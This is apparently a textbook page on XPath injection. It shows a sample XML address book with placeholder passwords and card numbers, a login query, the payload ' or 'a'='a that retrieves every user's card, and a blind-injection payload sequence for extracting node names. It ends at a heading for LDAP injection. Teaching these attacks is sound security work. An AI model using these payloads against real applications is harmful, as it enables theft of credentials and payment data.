Chapter 6- Attack execution( 2) P a g e | 127
< firstName > Chris </ firstName > < surname > Dawes </ surname > < password > secret </ password > < email > cdawes @ craftnet. de </ email > < ccard > 3981 2491 3242 3121 </ ccard > </ address > < address > < firstName > James </ firstName > < surname > Hunter </ surname > < password > letmein </ password > < email > james. hunter @ pookmail. com </ email > < ccard > 8113 5320 8014 3313 </ ccard > </ address > </ addressBook >
The following XPath query effectively verifies the user-supplied credentials and retrieves the relevant user’ s credit card number:
// address [ surname / text()=’ Dawes’ and password / text()=’ secret’]/ ccard / text()
Attack: The usage of the value(‘ or‘ a’=’ a) as password will result retrieving the credit card information for all users. If the structure of the document is not known it will be difficult to know how exactly what to write, usually we solve this problem using what is called blind Xpath injection.
‘ or substring( name( parent::*[ position()= 1 ]), 2,1)=’ a‘ or substring( name( parent::*[ position()= 1 ]), 2,1)=’ b‘ or substring( name( parent::*[ position()= 1 ]), 2,1)=’ c‘ or substring( name( parent::*[ position()= 1 ]), 2,1)=’ d Etc …
The previous listing can be used to extract node names.
6.12 LDAP injection